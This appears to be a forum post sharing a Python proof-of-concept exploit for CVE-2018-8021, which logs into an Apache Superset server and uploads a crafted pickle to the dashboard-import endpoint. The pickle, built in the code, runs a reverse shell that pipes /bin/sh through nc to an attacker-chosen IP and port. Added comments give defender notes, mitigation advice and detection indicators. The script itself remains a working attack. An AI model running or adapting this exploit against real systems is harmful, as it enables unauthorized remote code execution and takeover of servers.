CVE-2018-8021

POC CVE-2018-8021

Shacker已验证会员

Python:
'''_____________________________________________________________________
|[] SHELL                                                      |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"|
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > [email protected]                                   | |
|Original PoC by David May ([email protected])               | |
|_____________________________________________________________________|/|
'''

import sys
import os
from lxml import html
import requests
import argparse

# Browser-like request headers. main() assigns its own local ``headers_dict``,
# so the requests made there do not read this module-level copy.
headers_dict = dict([
    ('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0'),
    ('DNT', '1'),
    ('Connection', 'close'),
    ('Upgrade-Insecure-Requests', '1'),
])

def main() :
    """Proof of concept for CVE-2018-8021 (pickle upload to Superset).

    Steps, in order:
      1. Parse the command-line options (all six are required).
      2. Write a hand-built pickle file ``<ip>_<port>.pickle`` into the
         current working directory, replacing any existing one.
      3. Fetch the login page, read the ``csrf_token`` input from it and
         POST the supplied credentials.
      4. Fetch ``/superset/import_dashboards``, read the token again and
         POST the pickle file as a multipart upload.

    The account must hold the "can Import Dashboards on Superset"
    permission (see the option help), so the issue is an authenticated one.
    The script calls ``sys.exit()`` after the upload; on a connection error
    or any other exception it prints a message and returns.

    Defender notes:
      * The payload only has an effect if the server unpickles the uploaded
        file, which is the behaviour CVE-2018-8021 describes (the server
        code is not shown here). A pickle can name any importable callable,
        so loading one supplied by a user is equivalent to running that
        user's code with the privileges of the web application.
      * Mitigation: run a Superset release that contains the fix for
        CVE-2018-8021 (the fixed version is not stated on this page; check
        the vendor advisory), grant the dashboard-import permission only to
        trusted accounts, and restrict outbound connections from the
        application host.
      * Detection: POSTs to ``/superset/import_dashboards`` whose file part
        is a pickle referencing ``os`` / ``system``; the application worker
        spawning ``/bin/sh``, ``mknod`` or ``nc``; a FIFO appearing at
        ``/tmp/backpipe``; unexpected outbound TCP sessions from the host.
    """
    parser = argparse.ArgumentParser()
    # NOTE(review): the help text for -t/-tp says "for shell", but the code
    # below uses args.tcp/args.tport as host and port of the web application
    # URLs, while args.ip/args.port are embedded in the shell command.
    parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
    parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
    parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
    parser.add_argument('-p', '--port', help='port', dest='port', required = True)
    parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
    parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
    args = parser.parse_args()
    
    # Script arguments
    # Self-assignment: this line has no effect.
    args.port = args.port
    # Verify these URLs match your environment
    # Both URLs use plain http://, so the credentials posted below travel
    # unencrypted.
    login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
    upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
    # Remove a payload file left over from an earlier run with the same
    # ip/port pair before writing a new one.
    if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
        os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
    # Local dict; it shadows the module-level headers_dict of the same name.
    headers_dict = {
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
        'DNT': '1',
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1',
    }
    # Hand-written text pickle (not produced by pickle.dump): it references
    # os.system and passes one string argument, so unpickling it runs that
    # string as a shell command. The command creates a named pipe at
    # /tmp/backpipe and ties /bin/sh to an nc connection towards
    # args.ip:args.port. The leading "cos\nsystem\n" bytes and the
    # /tmp/backpipe path are stable strings a defender can match on.
    evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
    evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + args.ip + ' ' + args.port + ' 1>/tmp/backpipe\'\ntR.')
    evilPickle.close()
    try :
        # One session for the whole exchange, so cookies set at login are
        # reused for the upload.
        session = requests.session()   
        login_page = session.get(login_URL)
        # A non-200 status is only reported; execution continues regardless.
        if login_page.status_code != 200:
            print('Login page not reached')
        login_tree = html.fromstring(login_page.content)
        # xpath() returns a list of matching attribute values.
        token = login_tree.xpath('//input[@id="csrf_token"]/@value')
        
        # Form fields sent with the login POST.
        login_data = {
            'token' : token,
            'username' : args.user,
            'password' : args.passw,
        }
        headers_dict['Referer'] = login_URL
        # The login response is stored but never inspected, so a failed
        # login is not detected here.
        login = session.post(login_URL, headers=headers_dict, data=login_data)   
        upload_page = session.get(upload_URL)
        # As above: the status check only prints.
        if upload_page.status_code != 200:
            print('Upload page not reached')
        upload_tree = html.fromstring(upload_page.content)
        token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
        headers_dict['Referer'] = upload_URL
        # Multipart upload of the pickle as application/octet-stream. The
        # file object opened inline is never explicitly closed, and the
        # response is not examined.
        upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
        session.close()
        # SystemExit is not a subclass of Exception, so the handlers below
        # do not intercept this exit.
        sys.exit()
    except requests.exceptions.ConnectionError :
        print('Connection Refused, Check The IP and PORT!!!')
    except Exception as e:
        # Catch-all: any other failure is printed and main() returns.
        print('Error :\n\n' , e)
        
    
# Run main() only when the file is executed as a script; importing the
# module does not start the network exchange.
if __name__ == "__main__" :
    main()
 